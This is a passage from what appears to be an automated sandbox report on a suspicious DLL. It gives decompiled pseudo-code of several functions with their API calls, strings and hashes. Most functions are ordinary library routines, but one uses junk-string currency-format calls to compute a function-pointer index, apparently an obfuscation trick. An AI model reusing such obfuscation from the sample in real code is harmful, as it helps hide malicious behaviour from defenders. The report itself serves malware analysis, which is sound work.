					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E10012028(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100203EC(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x3
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E1001213D(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E1001213D(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E1001FBB5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

APIs

GlobalLock.KERNEL32 ref: 100121E4
lstrlenA.KERNEL32(?), ref: 1001222C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10012246

Strings

@, xrefs: 10012220

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: @
API String ID: 1529587224-2766056989
Opcode ID: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
Instruction ID: d0a0353f3703c4703b37301af5c7bc2eef77f2bc52e41b95a60fad612e9c4f7d
Opcode Fuzzy Hash: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
Instruction Fuzzy Hash: 0041AFB1900219EFDB15CFA4CC85AAEBBB5FF04350F148629E812EF185E774E9A5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013B33 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E10013B33(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_push(0x20);
				E1001FC2D(E10033E8D, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003876c;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E100124A0(_t59, _t59 + 0x24, _t75);
						E10010BA6(_t59 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E10010D56(_t59, 0x1003b23c) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E1001B91E(_t59 + 0x40);
						 *(_t77 - 4) = 0;
						E10012675(_t59, _t59 + 0x24, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						E100066CE(_t59);
						return E1001FCB0(_t59, _t75, _t76);
					}
					_t75 = _t59 + 0x40;
					do {
						_t76 = E1001B865(_t59, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							E100132FB(_t76);
							_push(_t76);
							E10004D75(_t59, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E1000911A(_t77 - 0x24)));
						if(_t76 != 0) {
							_t54 =  *((intOrPtr*)(_t76 + 4));
							if(_t54 != 0) {
								_t82 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E1001B896(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									E100132FB(_t76);
									_push(_t76);
									E10004D75(_t59, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 10013B3A
GetModuleHandleA.KERNEL32(?,1003B23C,00000000), ref: 10013C05
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 10013C15

Strings

MFCM80ReleaseManagedReferences, xrefs: 10013C0F
mfcm80.dll, xrefs: 10013BF4

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
Instruction ID: effe031cbf4f857fff4e6ce51dcecab954aad45063f71112ee54279e012bf132
Opcode Fuzzy Hash: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
Instruction Fuzzy Hash: 8931AD75A046049FDF05DFA0C8857AE77F9EF48340F014098E905AF292EB79E985CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10014290 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
comCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10014290(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E1001FC2D(E10033F1F, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038078;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E100136F0(_t91 - 0x54, 0x11) != 0 || E100136F0(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x1000ecc8
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E1000567F(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					E100100ED(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E10010BA6(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x1003b2dc, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E10010141(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E10001260( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038068;
				E100102E5(_t91 - 0x54);
				return E1001FCB0(_t74, 0, _t90);
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 1001429A
GetObjectA.GDI32(1000ECC8,0000003C,?), ref: 100142EC
GetDeviceCaps.GDI32(?,0000005A), ref: 1001435C
OleCreateFontIndirect.OLEAUT32(00000020,1003B2DC), ref: 10014388

Strings

, xrefs: 100142F9

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID:
API String ID: 2429671754-3916222277
Opcode ID: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
Instruction ID: 2f8d2d43e09bdf50e625724661aa14f311a958ac26713a9e64237ed0808844fe
Opcode Fuzzy Hash: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
Instruction Fuzzy Hash: C7417E74E012989FDB11CFE4C941ADDFBF4EF18340F10815AE955EB2A2EBB49A84CB11

Uniqueness

Uniqueness Score: -1.00%

Function 10006878 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10006878(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10045580; // 0x2ef01728
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10044410;
					E100209E8( &_v172, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t38, _t42, _t43);
					_t40 = E100105C8(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000E58E(_t40);
					}
					return E1001FC9C(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E10020F40(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1003720c;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x10048668 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x10048668 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E1001FBB5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 10006890
_memset.LIBCMT ref: 100068F2
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10006944
LoadBitmapA.USER32 ref: 1000695C

Strings

, xrefs: 100068B1

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
Instruction ID: 7502f03d00862ab63d890e742e6b2e485ad896773ebef231c484e9e01049f3a3
Opcode Fuzzy Hash: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
Instruction Fuzzy Hash: 9E31C572A0025A9FFF10CFB8CDC5AAE7BA5EF48384F25452AE906EB195DA309944C750

Uniqueness

Uniqueness Score: -1.00%

Function 10002863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10002863(intOrPtr* _a4) {
				int _v4;
				intOrPtr _v8;
				intOrPtr* _t26;
				short* _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				short* _t36;

				_t32 = L"xadqsavcbdfewescGADW";
				_t36 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v8 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9);
				_t33 =  *_a4 + 0xc0 + (_v4 + GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9)) *  *0x100440dc * 8;
				if( *_t33 != 0) {
					_t35 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t36, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *_t33 + _v8 + 0xc));
					if(_t35 != 0) {
						while(1) {
							_t26 =  *_t35;
							if(_t26 == 0) {
								goto L5;
							}
							 *_t26(_v8, 1, 0);
							_t35 = _t35 + 4;
						}
					}
				}
				L5:
				return 1;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10002895
GetCurrencyFormatW.KERNEL32 ref: 100028A7
GetCurrencyFormatW.KERNEL32 ref: 100028D7

Strings

xadqsavcbdfewescGADW, xrefs: 1000287B, 10002880, 1000289C, 100028CE
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000286D, 10002883, 10002888, 1000289F, 100028D4

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
Instruction ID: af9e15b59c393e0d8099aaf98a9213ea7197e89f84b9fb059b6d85f6975e4071
Opcode Fuzzy Hash: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
Instruction Fuzzy Hash: 7811BFB1604319BFE700DB55CC89F17BBECEB89754F12441AFA40EB291C771AC008B60

Uniqueness

Uniqueness Score: -1.00%

Function 10007AB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007AB6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E10008D3D(__ecx, __eflags, _t26) == 0) {
					_t10 = E1000B1DD(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E10009199(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E1001113D(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

Strings

Edit, xrefs: 10007B06

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
Instruction ID: c236510ebf9aa878e60991b13e4b4610bd432db7ec560ce308cb7ed9e00e23a0
Opcode Fuzzy Hash: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
Instruction Fuzzy Hash: 1301AD30B00252AEFA52D6208C44F4EF7A9FF457D5F104529F54AD60BACB68E860C621

Uniqueness

Uniqueness Score: -1.00%

Function 100143C9 Relevance: 7.6, APIs: 5, Instructions: 108
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E100143C9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E1001FBC4(E10033F57, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x10014589) & 0x000000ff) * 4 +  &M10014561))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E10014A76( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10004C10(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E100100ED(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E10010141(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E1001370D( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E10014290(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E1000AE99(__ebp + 0xc, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
